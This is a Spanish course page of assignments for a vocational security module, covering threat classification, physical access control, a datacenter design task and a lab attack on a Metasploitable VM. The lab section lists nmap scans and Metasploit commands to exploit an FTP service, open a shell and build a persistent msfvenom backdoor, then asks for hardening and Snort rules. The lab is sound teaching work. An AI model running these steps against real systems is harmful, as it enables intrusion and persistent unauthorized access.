Conocer las diferentes amenazas y vulnerabilidades así como las contramedidas que deben ser aplicadas para minimizar su impacto.
Descripción de la tarea
Elabora un mapa conceptual en el que queden relacionados las amenazas y vulnerabilidades, así como las contramedidas que las combaten y minimizan su impacto. No olvides incluir una clasificación de por tipos, origen y/o otros criterios de las vulnerabilidades y amenazas.
Entrega
Escribe una URL de acceso al mapa conceptual
Requisitos
La resolución de la imagen debe permitir leer sin dificultad todos los textos.
Recursos
Puedes comenzar a partir de este mapa. Y para conocer las vulnerabilidades y su clasificación puedes visitar esta web. Si quieres usar la app CMapTool puedes descargar el mapa pinchando aquí.
Criterios evaluación implicados
RA1.c Se han clasificado las principales vulnerabilidades de un sistema informático, según su tipología y origen.
RA.d Se ha contrastado la incidencia de las técnicas de ingeniería social en los fraudes informáticos.
Adquirir los conocimientos necesarios para decidir entre la implantación de unos sistemas de control de acceso físico u otros según los casos.
Descripción de la tarea
Elabora una infografía que contenga una tabla comparativa (u otro elemento gráfico) en la que se representen las ventajas, desventajas y un escenario de uso apropiado de los siguientes sistemas de control de acceso físico:
Algo que se sabe: Passwords, PIN.
Algo que se posee: Tarjeta, llave, etc.
Algo que se es: Sistemas biométricos:
Huella dactilar.
Voz.
Verificación de escritura.
Patrones oculares
Retina
Iris
Geometría de la mano
Termograma.
Reconocimiento facial.
Entrega
Enlace al recurso.
Requisitos
incluye referencias web consultadas.
El enlace es público y accesible por el profesor.
Contiene todos los sistemas de control requeridos.
Esta tarea ha sido diseñada para el módulo Seguridad y Alta Disponibilidad del ciclo de Administración de Sistemas informáticos, concretamente para trabajar el RA2: Implanta mecanismos de seguridad activa, seleccionando y ejecutando contramedidas ante amenazas o ataques al sistema.
Propósito
Adquirir las habilidades y conocimientos mencionados en los criterios de evaluación implicados que versan sobre la anatomía de los ataques, amenazas y software malicioso con la que cuentan los atacantes.
Descripción de la tarea
Para comenzar esta tarea y poder resolverla con solvencia debes visualizar todos los recursos de la sección de recursos y leer el material de la unidad en la plataforma Moodle.
El objetivo será realizar un ataque con éxito a la máquina víctima, analizar las medidas preventivas de hardening de la máquina víctima y por último prevenir las intrusiones realizadas con un sistema IDS Snort.
En resumen los pasos a seguir son los siguientes:
Crear la máquina virtual Metaexploitable. Esta máquina será nuestra víctima. Es una distro con múltiples vulnerabilidades.
Instalar el framework Metasploit en tu máquina (anfitrión) tal y como se explica en el curso de Open Webinars (o puedes seguir esta receta).
El siguiente paso sería la fase de Information gathering. Aquí tienes algunos consejos y comando útiles:
nmap -sS -Pnip-de-la-maquina-victima (Escaneo de puertos abiertos)
nmap -sV -p 21 –script vuln ip-de-la-maquina-victima (Escaneo más profundo en busca de vulnerabilidades de los servicios de la máquina víctima)
use auxiliary/scanner/portscan/tcp (Escáner alternativo para evitar falsos positivos)
search vsftpd 2.3.4 (Buscamos exploit para un servicio vulnerable de la máquina víctima)
use exploit/unix/ftp/proftpd_modcopy_exec (seleccionamos un exploit)
show payloads (muestra los payloads compatibles con dicho exploit)
set payload 5 (seleccionamos uno que funciona)
options (vemos las opciones del payloads)
set rhosts ip-de-la-maquina-victima (configuramos las opciones requeridas)
run (ejecutamos el exploit)
Si has seguido los pasos correctamente deberías tener una session shell abierta en la máquina víctima. A partir de aquí podrías realizar varias opciones. Vamos a ver alguna de ellas.
Crea una puerta trasera (backdoor) con msfvenom y meterpreter para poder tener acceso persistente.
Analiza con un antivirus el malware diseñado. ¿Consigue identificarlo?
¿Qué otras maldades se podrían conseguir llegado a este punto? ¿Qué tipos de malware podrías usar llegado este momento?
¿Qué fases del ciberataque analizadas en clase identificas en el ataque realizado y qué herramientas has usado en cada fase?
¿Qué medidas de hardening recomendarías para haber evitado el ataque?
Instalar el IDS Snort en la máquina víctima. Este software nos servirá para monitorizar la máquina víctima y detectar intrusiones para actuar en caso de sospecha.
Lanza este comando en la consola de la máquina victima para monitorizar la información de Snort: snort -v -A console -c /etc/snort/snort.conf \ -i eth0
Lanza ahora el ataque de nuevo y comenta qué ocurre.
¿Qué regla de snort ayudaría a prevenir el ataque realizado o al menos a paliar el impacto? Explica el objetivo de la regla.
Realiza una presentación de Google Drive que contenga capturas de pantalla para documentar el proceso seguido y contestar a las preguntas planteadas.
Fíjate bien en la rúbrica de evaluación para ofrecer la suficiente información para que tu entrega sea evaluada de una manera cómoda para tu profesor.
Entrega
Escribe el enlace a la presentación en el editor de esta tarea. No olvides contestar a las preguntas planteadas en la presentación.
Requisitos
Las capturas deben mostrar evidencias de la autoría como tu nombre de usuario o cualquier otra característica que te identifique.
Repasar los fundamentos del estándar ANSI/TIA 942 de diseño de datacenters y aplicarlos a un caso concreto sencillo.
Descripción de la tarea
Imagina que te han encargado el diseño de un nuevo datacenter para una este centro. Los equipos de debe albergar serán:
Un rack con 3 servidores donde está instalado el server Proxmos en alta disponibilidad.
El switch distribuidor de planta y su patch panel correspondiente.
Un RAID de discos.
Basándose en los principios del estándar ANSI/TIA-942, debes especificar qué medidas de seguridad físicas aplicarías para el contexto de este caso práctico propuesto explicando por qué crees que serán efectivas y adecuadas para este caso concreto.
Entrega
Escribe directamente tus propuestas en el editor de Moodle de esta tarea.
Criterios de evaluación y calificación
Grado de adecuación de la solución propuesta al problema planteado.
Cumplimiento de los requisitos de entrega.
Conocimiento de diversas medidas de seguridad y características del diseño de los datacenters.